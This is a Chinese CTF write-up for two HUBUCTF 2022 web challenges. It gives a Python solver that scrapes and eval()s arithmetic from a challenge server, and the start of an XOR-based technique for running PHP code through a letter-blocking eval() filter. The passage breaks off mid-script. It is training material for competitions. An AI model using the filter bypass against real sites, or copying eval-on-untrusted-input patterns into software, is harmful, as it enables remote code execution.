文章目录
HUBUCTF 2022 新生赛
web
Calculate
连续快速计算20次获得flag
import requests
import time
from bs4 import BeautifulSoup
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "Accept-Encoding",
"Cookie": "PHPSESSID=ifrftrs78dhbppdtjkjm8pspa0"
}
for i in range(20):
req = requests.get('http://1.14.71.254:28933/index.php',headers=headers)
soup = BeautifulSoup(req.text,'html.parser')
print(soup.prettify())
s=''
for k in soup.find_all('div'):
s+=k.string
print(s)
print(eval(s[:-1]))
time.sleep(1)
data = {
"ans":str(eval(s[:-1]))}
req2 = requests.post('http://1.14.71.254:28933/index.php',data=data,headers=headers)
print(req2.text)
time.sleep(1)
HowToGetShell
<?php
show_source(__FILE__);
$mess=$_POST['mess'];
if(preg_match("/[a-zA-Z]/",$mess)){
die("invalid input!");
}
eval($mess);
使用异或构造无字符代码执行
valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "
answer = "phpinfo"
tmp1, tmp2